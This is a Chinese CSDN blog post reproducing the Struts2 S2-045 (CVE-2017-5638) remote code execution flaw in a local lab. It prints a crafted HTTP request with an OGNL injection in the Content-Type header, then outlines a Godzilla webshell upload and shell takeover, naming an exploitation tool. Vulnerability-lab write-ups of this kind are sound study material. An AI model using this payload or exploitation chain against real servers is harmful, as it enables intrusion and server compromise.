struts2-045 远程代码执行漏洞(CVE-2017-5638)

文章详细描述了如何在Ubuntu系统中设置并开启S2-045远程代码执行漏洞环境,通过浏览器访问并上传文件,抓取和修改数据包来触发漏洞。利用Struts2漏洞检测工具和哥斯拉生成并上传木马文件,最终获取服务器的shell,展示了整个漏洞利用过程。
摘要由CSDN通过智能技术生成

目录

S2-045 远程代码执行漏洞(CVE-2017-5638)

开启漏洞环境


S2-045 远程代码执行漏洞(CVE-2017-5638)

开启漏洞环境

 进入Ubuntu系统下的对应漏洞环境,开启环境

443c8b97fcc37ce64e8b1069023097a7.png

 将漏洞环境开启来

d3a0e5616b3128e6f6ecdf5bfcb88371.png

查看是否启动成功

2cec38063d847f84754bcd68b87f2c7c.png

 启动成功过后,去浏览器进行访问:
通过浏览器去访问该漏洞环境
 http://ip:8080

335074169bbf20760e2c19d8915e5dce.png

 接下来我们尝试去上传文件(随便上传),然后抓取数据包,修改数据包,然后观察响应数据的变化

随便上传一个文件

46bb7cf065b95e050a53ab97cf375e20.png

抓取数据包:

抓取数据包,修改数据包,查看修改后,收到的响应数据
 ​
 直接发送以下数据包
 POST / HTTP/1.1
 Host: localhost:8080
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Accept-Language: en-US,en;q=0.8,es;q=0.6
 Connection: close
 Content-Length: 0
 Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('lc',123+123)}.multipart/form-data
 ​
 发现123+123已经被执行,显示出结果

抓包

fa412675daa1d6e4ae9c16592007eb26.png

发给重发器过后:

 修改数据包信息,查看响应

7fdda7874260d55712e615656257d861.png

 观察发现我们输入的123+123,已经被执行

 解析了以后,我们借助第三方工具,来进行生成木马文件,然后进行随意上传文件,进行漏洞检测,然后上传木马文件,获取服务器的shell
 工具:哥斯拉、struts2漏洞检测工具

打开哥斯拉,生成木马:

ab53582cab5a79b49373da384a7a1bb3.png

 查看木马文件

2803267960a1f99cac7624e956148b75.png

 将随意的文件尝试上传,观察url变化

f5ea321e07127f9fca51bb59e9df21ba.png

 上传后,观察此url

432de02917b92dd29090f6f14a337e41.png

 
复制此url,借助第三方工具进行扫描
 工具:struts2漏洞扫描工具

27e8ee4b8b54263b9dd87dc8c7c25ce7.png

 查看检查结果,存在漏洞

eb8619af20892b5178d646073d3f06c1.png

 验证漏洞

fda3214a244a6d0d29c8515ca5020a4a.png

 远程命令执行

c957674c6f0df27049072a396190eb68.png

 查看根目录下的内容

6acf5d16f4d1df8964af1cf5bca0fc61.png

 点击文件上传模块,尝试上传木马文件

a0875707e81f29f95c783124283611e0.png

 查看是否能够上传成功,观察到已经上传成功

ea682d3fac9af91666d566f73535a968.png

strut2漏洞检测以及利用工具地址:

https://github.com/shack2/Struts2VulsTools/releases/tag/2.3.20190927

 观察上传访问路径,进行复制,使用第三方工具(哥斯拉)进行连接

3e4a89c124e3524e31d9155f800da547.png

 通过哥斯拉来进行连接

fee7fc88f5a52f45e784cff3719f9e18.png

 连接成功,进行添加,进入,成功拿到服务器shell

c93cd155b5952423d89c08b4da52000b.png

 成功添加

6edb7db638e8da158d04fbab88e36ff1.png

 点击进入即可,成功拿到shell

94231fc5228390f31e80febe3448fb61.png

可对文件进行任何操作:

67c5ce8ef9ca360fbdcaf169f5e5fa67.png

文章不妥之处,欢迎批评指正! 

  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值